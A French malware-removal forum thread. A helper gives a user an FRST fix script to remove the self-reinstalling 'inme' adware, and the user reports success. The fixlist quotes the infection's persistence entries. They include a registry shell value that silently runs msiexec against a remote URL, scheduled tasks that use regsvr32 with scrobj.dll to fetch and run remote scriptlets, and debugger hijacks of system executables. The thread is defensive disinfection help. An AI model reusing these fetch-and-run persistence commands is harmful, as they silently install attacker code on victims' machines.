pb virus inme et chrome

Aide à la désinfection pour supprimer les virus, adwares, ransomwares, trojans.

Modérateurs : Mods Windows, Helper

rixinter75

pb virus inme et chrome

par rixinter75 »

Bonjour,

je voudrais savoir si quelqu'un aurais une solution a mon problème
Depuis quelques jours, Chrome c'est installer sur mon ordi,
et j'ai inme qui s'installe sur firefox .

j'ai utilise malwarebyte,ZHPCleaner,adwcleaner_6.047
il me supprime inme et après il se réinstalle.

j'ai lance FRST,


FRST: http://pjjoint.malekal.com/files.php?id ... s14u13h7j5

ADDITION: http://pjjoint.malekal.com/files.php?id ... 11c9u14v11

SHORTCUT:http://pjjoint.malekal.com/files.php?id ... 10p9s8l8i8

merci
Malekal_morte
Messages : 112100
Inscription : 10 sept. 2005 13:57

Re: pb virus inme et chrome

par Malekal_morte »

Salut,

Désinstalle ces programmes :
Java
Spybot (inefficace)
Wondershare

Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :

Code : Tout sélectionner

CloseProcesses:
 HKU\S-1-5-21-3804469839-1907871529-1261901574-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8cRUQLMjq1FTk3M8Y8MjYxRTLQNWw5RTNWM8F4FTq4Nq== /q [Pays US - 104.24.101.133] 
IFEO\DisplaySwitch.exe: [Debugger] 
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe 
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe 
IFEO\taskmgr.exe: [Debugger] 
 R2 WinCacheSrv; C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp [205826 ] () [Fichier non signé] <==== ATTENTION 
 S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2013-05-27] (Microsoft Corporation)  
 R2 WsAppService; C:\Program Files\Wondershare\WAF\2.2.0.5\WsAppService.exe [411648 2016-03-31] (Wondershare) [Fichier non signé] 
 S3 WsDrvInst; C:\Program Files\Wondershare\MirrorGo\DriverInstall.exe [111120 2016-01-07] (Wondershare)  
C:\Program Files\Wondershare
 R2 SDScannerService; C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe [1750712 2015-06-16] (Safer-Networking Ltd.) [Fichier non signé] 
 R2 SDUpdateService; C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe [2102496 2015-06-16] (Safer-Networking Ltd.) [Fichier non signé] 
 R2 SDWSCService; C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe [224712 2015-07-24] (Safer-Networking Ltd.) [Fichier non signé] 
 2017-05-17 09:29 - 2017-05-17 09:29 - 07178424 _____ (VS Revo Group ) C:\Users\rixinter75\Downloads\revosetup.exe  
 2017-05-11 18:43 - 2017-05-25 08:55 - 00000000 _____ C:\Windows\system32\3333333 
 2017-05-11 18:43 - 2017-05-11 18:43 - 00000000 ____D C:\Users\Administrateur\AppData\Roaming\Firefox  
 2017-05-11 18:43 - 2017-05-11 18:43 - 00000000 ____D C:\Users\Administrateur\AppData\Local\Firefox 
 2017-05-11 18:42 - 2017-05-25 08:55 - 00000000 _____ C:\Windows\system32\1111111 
 2017-05-11 18:42 - 2017-05-17 13:12 - 00000000 _____ C:\Windows\system32\11 
 2017-05-11 18:41 - 2017-05-17 13:12 - 00000000 _____ C:\Windows\system32\00 
 2017-05-11 18:40 - 2017-05-11 18:46 - 00000000 ____D C:\Users\Administrateur\AppData\LocalLow\Mozilla 
 2017-05-25 08:55 - 2017-05-25 08:55 - 00000042 _____ C:\Windows\system32\GZ 
 2017-05-24 09:08 - 2017-05-24 09:08 - 00000000 ____D C:\Users\rixinter75\AppData\Local\Cupduck 
 2017-05-24 09:08 - 2017-05-24 09:08 - 00000000 ____D C:\Users\Public\Documents\Google 
 2017-05-24 09:08 - 2017-05-24 09:08 - 00000000 ____D C:\Program Files\Cupduck 
 2017-05-24 09:04 - 2017-05-26 16:50 - 00000000 ____D C:\Program Files\BiaoJi 
 2017-05-23 21:54 - 2017-05-23 22:01 - 731159650 _____ C:\Users\rixinter75\Downlo
Task: C:\Windows\Tasks\{4DFF1CA5-4BE2-87CB-48B6-15AFFD936FA0}.job => C:\Users\RIXINT~1\AppData\Roaming\wincy\PRODUC~1.EXE
 C:\Users\RIXINT~1\AppData\Roaming\wincy
C:\Users\rixinter75\AppData\Local\Programs\Opera
Task: {DF245161-9DCA-4A05-A876-691D43BCE90D} - System32\Tasks\Opera scheduled suite Autoupdate 1492345494 => C:\Users\rixinter75\AppData\Local\Programs\Opera\launcher.exe 
Task: {BF19A7C9-D8FB-4102-97DC-EAAB2F4021E7} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj8cRUQLMjq1FTk3M8Y8MjYxRTLQNWw5RTNWM8F4FTq4Nq== scrobj.dll
Task: {BFC211B6-B41B-431D-991B-E14D6D701C54} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files\Spybot - Search & Destroy 2\SDScan.exe [2015-06-16] (Safer-Networking Ltd.)
Task: {C9AADEBC-5F68-465F-AEE5-3A3513C73C9B} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8cRUQLMjq1FTk3M8Y8MjYxRTLQNWw5RTNWM8F4FTq4Nq== scrobj.dll
Task: {A23CDBC0-C4BF-4757-9A7A-5249044A113B} - System32\Tasks\Opera scheduled Autoupdate 1492345492 => C:\Users\rixinter75\AppData\Local\Programs\Opera\launcher.exe 
Task: {B330F6E6-1842-433F-A106-331DCFEBE5CB} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files\Spybot - Search & Destroy 2\SDUpdate.exe [2015-06-16] (Safer-Networking Ltd.)
Task: {55BFFA4D-DBFB-46E5-B783-AA8741E5F872} - System32\Tasks\Yahoo! Powered lelel 
EmptyTemp:
RemoveProxy:
CreateRestorePoint:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.


2°)
Réinitialise/Répare les navigateurs WEB concerné(s) par les problèmes :
* réparer Mozilla Firefox (premier paragraphe)
* réparer Google Chrome (premier paragraphe)
* Réinitialiser et réparer Internet Explorer

2°)

Procède à un nettoyage Malwarebytes Anti-Malware (MBAM ) version gratuite
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
rixinter75

Re: pb virus inme et chrome

par rixinter75 »

ok,
merci j'ai fait ce que tu ma dit et c'est bon
encore merci
Malekal_morte
Messages : 112100
Inscription : 10 sept. 2005 13:57

Re: pb virus inme et chrome

par Malekal_morte »

de rien =)

Tu peux supprimer le dossier C:\FRST =)

Termine par un nettoyage Malwarebytes Anti-Malware (MBAM ) version gratuite


Quelques conseils :

Pour ne plus te faire avoir.
A lire - Programmes parasites / PUPs : Dossier Adwares/PUPs : programmes indésirables et parasites
(Surtout active les détections LPIs pour détecter les programmes parasites et publicitaires)
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
  • Sujets similaires
    Réponses
    Vues
    Dernier message

Revenir à « Supprimer/Desinfecter les virus (Trojan, Adwares, Ransomwares, Backdoor, Spywares) »